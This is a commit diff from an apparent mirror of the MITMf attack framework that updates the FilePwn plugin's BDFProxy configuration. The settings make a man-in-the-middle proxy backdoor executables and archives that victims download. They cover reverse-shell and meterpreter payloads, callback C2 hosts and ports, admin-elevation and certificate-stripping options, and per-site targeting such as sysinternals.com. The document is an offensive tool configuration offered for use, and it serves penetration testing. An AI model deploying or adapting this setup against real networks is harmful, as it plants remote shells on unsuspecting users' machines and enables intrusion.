mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-21 05:53:30 -07:00
Updated Filepwn plugin to the latest BDFactory & BDFProxy version
This commit is contained in:
byt3bl33d3r
parent
1a50f000c1
commit
1a5c7c03b7
6 changed files with 542 additions and 508 deletions
|
|
@ -334,172 +334,186 @@
|
|||
|
||||
[FilePwn]
|
||||
|
||||
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||
#
|
||||
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||
#
|
||||
# Copyright (c) 2013-2014, Joshua Pitts
|
||||
# All rights reserved.
|
||||
#
|
||||
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||
# Redistribution and use in source and binary forms, with or without modification,
|
||||
# are permitted provided that the following conditions are met:
|
||||
#
|
||||
# Copyright (c) 2013-2014, Joshua Pitts
|
||||
# All rights reserved.
|
||||
# 1. Redistributions of source code must retain the above copyright notice,
|
||||
# this list of conditions and the following disclaimer.
|
||||
#
|
||||
# Redistribution and use in source and binary forms, with or without modification,
|
||||
# are permitted provided that the following conditions are met:
|
||||
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
# this list of conditions and the following disclaimer in the documentation
|
||||
# and/or other materials provided with the distribution.
|
||||
#
|
||||
# 1. Redistributions of source code must retain the above copyright notice,
|
||||
# this list of conditions and the following disclaimer.
|
||||
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||
# may be used to endorse or promote products derived from this software without
|
||||
# specific prior written permission.
|
||||
#
|
||||
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
# this list of conditions and the following disclaimer in the documentation
|
||||
# and/or other materials provided with the distribution.
|
||||
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||
# POSSIBILITY OF SUCH DAMAGE.
|
||||
#
|
||||
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||
# may be used to endorse or promote products derived from this software without
|
||||
# specific prior written permission.
|
||||
#
|
||||
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||
# POSSIBILITY OF SUCH DAMAGE.
|
||||
#
|
||||
# Tested on Kali-Linux.
|
||||
|
||||
[[hosts]]
|
||||
#whitelist host/IP - patch these only.
|
||||
#ALL is everything, use the blacklist to leave certain hosts/IPs out
|
||||
#whitelist host/IP - patch these only.
|
||||
#ALL is everything, use the blacklist to leave certain hosts/IPs out
|
||||
|
||||
whitelist = ALL
|
||||
whitelist = ALL
|
||||
|
||||
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
|
||||
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
|
||||
|
||||
blacklist = , # a comma is null do not leave blank
|
||||
blacklist = , # a comma is null do not leave blank
|
||||
|
||||
|
||||
[[keywords]]
|
||||
#These checks look at the path of a url for keywords
|
||||
#These checks look at the path of a url for keywords
|
||||
|
||||
whitelist = ALL
|
||||
whitelist = ALL
|
||||
|
||||
#For blacklist note binaries that you do not want to touch at all
|
||||
#For blacklist note binaries that you do not want to touch at all
|
||||
|
||||
# Also applied in zip files
|
||||
# Also applied in zip files
|
||||
|
||||
blacklist = .dll
|
||||
|
||||
blacklist = Tcpview.exe, skype.exe, .dll
|
||||
|
||||
[[ZIP]]
|
||||
# patchCount is the max number of files to patch in a zip file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
# patchCount is the max number of files to patch in a zip file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
|
||||
patchCount = 5
|
||||
patchCount = 5
|
||||
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
# In Bytes
|
||||
maxSize = 50000000
|
||||
|
||||
blacklist = .dll, #don't do dlls in a zip file
|
||||
blacklist = .dll, #don't do dlls in a zip file
|
||||
|
||||
[[TAR]]
|
||||
# patchCount is the max number of files to patch in a tar file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
# patchCount is the max number of files to patch in a tar file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
|
||||
patchCount = 5
|
||||
patchCount = 5
|
||||
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
# In Bytes
|
||||
maxSize = 10000000
|
||||
|
||||
blacklist = , # a comma is null do not leave blank
|
||||
blacklist = , # a comma is null do not leave blank
|
||||
|
||||
[[targets]]
|
||||
#MAKE SURE that your settings for host and port DO NOT
|
||||
# overlap between different types of payloads
|
||||
|
||||
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
|
||||
|
||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||
FatPriority = x64 # choices: x86 or x64
|
||||
|
||||
FileSizeMax = 10000000 # ~10 MB (just under) No patching of files this large
|
||||
|
||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||
FatPriority = x64 # choices: x86 or x64
|
||||
|
||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||
|
||||
CompressedFiles = True #True/False
|
||||
|
||||
CompressedFiles = True #True/False
|
||||
[[[[LinuxIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||
HOST = 192.168.1.168 # The C2
|
||||
PORT = 8888
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||
HOST = 192.168.1.168 # The C2
|
||||
PORT = 8888
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
||||
|
||||
[[[[LinuxIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 9999
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 9999
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
||||
[[[[WindowsIntelx86]]]]
|
||||
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
PATCH_METHOD =
|
||||
HOST = 172.16.206.7
|
||||
PORT = 8444
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = False
|
||||
PATCH_DLL = True
|
||||
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
|
||||
PATCH_METHOD =
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8090
|
||||
# SHELL for use with automatic PATCH_METHOD
|
||||
SHELL = iat_reverse_tcp_inline_threaded
|
||||
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
# PATCH_DLLs as they come across
|
||||
PATCH_DLL = False
|
||||
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
|
||||
RUNAS_ADMIN = True
|
||||
# XP_MODE - to support XP targets
|
||||
XP_MODE = True
|
||||
# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
|
||||
# with PATCH_METHOD 'replace' use an EXE not DLL
|
||||
SUPPLIED_BINARY = veil_go_payload.exe
|
||||
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
||||
|
||||
[[[[WindowsIntelx64]]]]
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
PATCH_METHOD =
|
||||
HOST = 172.16.206.1
|
||||
PORT = 8088
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
PATCH_DLL = False
|
||||
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE, use automatic or onionduke
|
||||
PATCH_METHOD = automatic
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8088
|
||||
# SHELL for use with automatic PATCH_METHOD
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
PATCH_DLL = True
|
||||
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
|
||||
RUNAS_ADMIN = True
|
||||
# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
|
||||
# with PATCH_METHOD 'replace' use an EXE not DLL
|
||||
SUPPLIED_BINARY = pentest_x64_payload.exe
|
||||
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
||||
|
||||
[[[[MachoIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 4444
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 4444
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
||||
[[[[MachoIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 5555
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 5555
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
||||
# Call out the difference for targets here as they differ from ALL
|
||||
# These settings override the ALL settings
|
||||
|
||||
[[[sysinternals.com]]]
|
||||
LinuxType = None
|
||||
WindowsType = x86
|
||||
CompressedFiles = False
|
||||
# Call out the difference for targets here as they differ from ALL
|
||||
# These settings override the ALL settings
|
||||
|
||||
[[[sysinternals.com]]]
|
||||
LinuxType = None
|
||||
WindowsType = ALL
|
||||
CompressedFiles = False
|
||||
#inherits WindowsIntelx32 from ALL
|
||||
[[[[WindowsIntelx86]]]]
|
||||
[[[[WindowsIntelx86]]]]
|
||||
PATCH_DLL = False
|
||||
ZERO_CERT = True
|
||||
|
||||
[[[sourceforge.org]]]
|
||||
[[[sourceforge.org]]]
|
||||
WindowsType = x64
|
||||
CompressedFiles = False
|
||||
|
||||
[[[[WindowsIntelx64]]]]
|
||||
[[[[WindowsIntelx64]]]]
|
||||
PATCH_DLL = False
|
||||
|
||||
[[[[WindowsIntelx86]]]]
|
||||
[[[[WindowsIntelx86]]]]
|
||||
PATCH_DLL = False
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue